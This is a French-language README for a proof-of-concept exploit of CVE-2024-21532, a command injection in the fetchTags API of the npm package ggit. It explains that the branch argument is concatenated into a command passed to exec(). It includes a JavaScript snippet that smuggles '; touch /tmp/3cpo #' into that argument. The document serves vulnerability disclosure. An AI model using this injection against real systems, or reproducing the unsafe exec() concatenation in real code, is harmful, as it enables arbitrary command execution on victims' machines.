
Exploit de preuve de concept pour CVE-2024-21532, une vulnérabilité d'injection de commande dans l'API fetchTags du package npm ggit, démontrant l'utilisation dangereuse de exec().
ggit se décrit comme :
Local promise-returning git command wrappers
Ressources :
Article détaillant cette vulnérabilité : https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability
Je signale une vulnérabilité d'injection de commande dans le paquet npm ggit.
Cette vulnérabilité se manifeste avec l'API fetchTags(branch) de la bibliothèque,
qui permet à l'entrée utilisateur de spécifier la branche à récupérer puis concatène
cette chaîne avec une commande git qui est ensuite passée à l'API dangereuse exec()
de processus enfant Node.js.
[email protected] ou une version antérieureconst fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
// should be same as running command
// git pull origin --tags
console.log("done");
});
/tmp/3cpoVeuillez consulter CONTRIBUTING pour les directives de contribution à ce projet.
Liran Tal